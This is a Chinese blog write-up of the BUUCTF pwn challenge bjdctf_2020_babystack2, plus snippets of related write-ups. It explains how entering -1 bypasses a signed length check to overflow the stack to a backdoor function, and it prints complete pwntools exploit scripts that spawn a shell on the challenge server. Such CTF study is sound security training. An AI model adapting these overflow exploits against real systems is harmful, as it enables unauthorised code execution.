【BUUCTF】bjdctf_2020_babystack2

最新推荐文章于 2024-05-13 18:34:53 发布
最新推荐文章于 2024-05-13 18:34:53 发布
阅读量320 收藏 1
点赞数 1
分类专栏: PWN 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51251108/article/details/111955603
版权
本文详细介绍了如何利用无符号和有符号整型转换的特性,绕过10的比较限制,特别是在BUUCTF的bjdctf_2020_babystack2挑战中。通过发送特定的输入如-1,结合内存布局和函数指针操纵,实现远程控制目标程序。提供的exploit代码展示了这种攻击方法。
摘要由CSDN通过智能技术生成

【BUUCTF】bjdctf_2020_babystack2

64位,无canary
在这里插入图片描述
有后门函数
在这里插入图片描述
这题思路就是用无符号和有符号整型来绕过10的比较
比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1
这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号
所以可以绕过
在这里插入图片描述
exp:

from pwn import*
r=remote('node3.buuoj.cn',29907)
context.log_level = 'debug'
backdoor=0x400726
r.sendline('-1')
r.send('a'*0x10+'b'*8+p64(backdoor))
r.interactive()

注:这里送-1,后面要加\n,或用sendline,不然打不通

Nq0inaen
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTFbjdctf_2020_babystack2(write up)
qq_44768749的博客
08-24 1480
BUUCTFbjdctf_2020_babystack20x01文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01文件分析 64位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 先输入name的长度,再输入name 0x03 IDA 输入nbytes的长度要小于10 同时给出了后面函数直接getshell 0x04 思路 比较nbytes和10的大小,可以利用符号溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数ge
bjdctf_2020_babystack2【BUUCTF
qq_41696518的博客
08-31 802
bjdctf_2020_babystack2【BUUCTF
[BJDCTF 2020]babystack2.0 CTF-PWN
最新发布
m0_72904009的博客
05-13 162
[BJDCTF 2020]babystack2.0 CTF-PWN
[BUUCTF]PWN——bjdctf_2020_babystack2
mcmuyanga的博客
11-03 607
bjdctf_2020_babystack2 附件 步骤: 例行检查,64位程序,开启了nx保护 尝试运行一下程序,看看情况 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726 从main函数开始看程序 我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是 大概就是一个无符号整型,注意重点是无符
[BUUCTF-pwn]——bjdctf_2020_babystack2
Y_peak的博客
02-22 197
[BUUCTF-pwn]——bjdctf_2020_babystack2 题目地址: https://buuoj.cn/challenges#bjdctf_2020_babystack2 先checksec一下 在IDA中查看一下,注意想要栈溢出,首先需要nbytes足够大。size_t类型在标准C语言库中,是unsigned int类型, 64位 long unsigned int。 而%d 是按照int类型读取的,我们读入-1。其实就相当于一个很大的数字,但是可以绕过检查。具体可以了解下整型溢出
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 618
bjdctf_2020_babystack2
bjdctf_2020_babystack2
m0sway的博客
04-04 392
bjdctf_2020_babystack2 WriteUp BUU_PWN
bjdctf 2020 babystack2
pondzhang的专栏
05-19 238
from pwn import * p = process('./bjdctf_2020_babystack2') p.sendlineafter("length of your name:\n","-1") payload = 24*'a'+ p64(0x0000000000400893) + p64(0) + p64(0x0000000000400726) p.sendlineafter("name?\n",payload) p.interactive()
BUUCTF(pwn)bjdctf_2020_babystack2
半岛铁盒的博客
04-04 200
这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...
BUUCTF|PWN-bjdctf_2020_babystack2-WP
l2645470582_的博客
11-09 399
1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串,我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址:backdoor_addr = 0x0400726 3.我们看看main函数里面的内容 我们看到第一个nbytes是有符号数,第二个nbytes就变成了无符号数 我们判断这是一个整数溢出 所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...
[BUUOJ]bjdctf_2020_babystack2
Do1phln的博客
10-25 137
checksec是64位小端序,IDA分析看没找到明显的输入溢出逻辑,但是找到了后门函数,再仔细观察发现数值里面有强制转换,有一部分从int转到了unsigned int,因此可以初步判定为整型溢出,如果我输入-1即可突破长度为10的限制,所以以此下手即可成功修改返回地址,getshell。
BUUCTF-Pwn-bjdctf_2020_babystack2
餐桌上的猫
03-25 131
exp from pwn import* p=remote('node4.buuoj.cn',26509) backdoor=0x0400726 ret=0x40073a p.sendlineafter(b'name:\n',b'-1') payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor) p.sendlineafter(b'name?\n',payload) p.interactive()
BUUCTF pwn——bjdctf_2020_babystack2
CNS-Enterprise BCC-1701-J
04-12 97
BUUCTF 做题练习
buu bjdctf_2020_babystack2 整数溢出、栈溢出
qq_41849152的博客
09-14 163
整数溢出、栈溢出
BUU刷题-Pwn-bjdctf_2020_babystack2
一个啥也不会的小菜鸡!
06-21 126
因此可以输入0x80000001=>2147483649,signed int类型被当做负数小于10,read函数中unsigned int类型被当成正整数2147483649。比较nbytes和10的大小,可以利用无符号整数溢出漏洞,输入一个负数,进而输入name的时候可以实现栈溢出跳转到后门函数getshell。nbytes是signed int类型,4字节,但后面read函数输入name时却是unsigned int类型。
BUUCTF-bjdctf_2020_babystack2-WP
Rt1Text的博客
10-18 172
只有NX保护。
buuctf luky_guy
09-28
Luky库是一组抽象复杂操作的Java类,它提供了各种功能,包括网络...根据提供的引用内容,无法直接了解到buuctf luky_guy的具体信息。如果您能提供更多关于buuctf luky_guy的背景信息,我可以尝试为您提供更准确的答案。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值